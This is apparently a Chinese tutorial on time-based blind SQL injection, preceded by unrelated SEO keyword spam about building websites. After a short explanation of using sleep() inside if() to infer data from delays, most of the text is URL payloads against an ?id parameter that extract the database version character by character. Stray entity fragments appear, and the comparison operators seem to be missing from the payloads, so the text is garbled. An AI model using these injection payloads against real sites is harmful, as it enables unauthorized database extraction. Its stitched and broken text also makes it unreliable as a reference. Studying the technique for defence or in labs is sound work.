怎样在建设厅网站里查开发商,餐饮网站建设需求分析,建设一个人才网站需要的人才,门户网站登录页面文章目录 延时注入是什么#xff1f;延时注入获取数据库版本号 延时注入是什么#xff1f; 延时注入就是利用sleep()函数通过if语句判断所写的语句真假#xff0c;如果为真返回我们想要的东西#xff08;例如#xff1a;数据库的长度#xff0c;数据库的名字等#xff0… 文章目录 延时注入是什么延时注入获取数据库版本号 延时注入是什么 延时注入就是利用sleep()函数通过if语句判断所写的语句真假如果为真返回我们想要的东西例如数据库的长度数据库的名字等如果我们写的东西不符合则会利用sleep()函数让服务器休眠。 固定的理解sleep(x) 函数的意义是关键就是个自行设定如果判断成功那么就会延迟x秒 延时注入的关键是sleep函数和if语句通过sleep函数判断语句的真假为真延迟对应的秒数为假就无延迟。
延时注入获取数据库版本号 substr函数截取字符 ascii将截取的字符转为ASCII值进行判断 sleep为真休眠如果不为真if函数返回后面的值1and 1为真所以会输出前面的内容。 判断版本号长度
?id2 and if(length(version()))6,sleep(5),1) --有延时返回为真版本号长度为6个字符
用ASCII码判断版本号第一个字符
?id2 and if(ascii(substr(version(),1,1))53,sleep(5),1) --有延时返回为真第一个字符ASCII码为53即数字5 用ASCII码判断版本号第二个字符
?id2 and if(ascii(substr(version(),2,1))46,sleep(5),1) --有延时返回为真第二个数字ASCII码为46即字符. 用ASCII码判断版本号第三个字符
?id2 and if(ascii(substr(version(),3,1))53,sleep(5),1) --有延时返回为真第三个字符ASCII码为53即数字5 用ASCII码判断版本号第四个字符
?id2 and if(ascii(substr(version(),4,1))46,sleep(5),1) --有延时返回为真第四个字符ASCII码为46即字符. 用ASCII码判断版本号第五个字符
?id2 and if(ascii(substr(version(),5,1))53,sleep(5),1) --有延时返回为真第五个字符ASCII码为53即数字5 用ASCII码判断版本号第六个字符
?id2 and if(ascii(substr(version(),6,1))51,sleep(5),1) --有延时返回为真第六个字符ASCII码为51即数字3 所以数据库版本号为 5.5.53
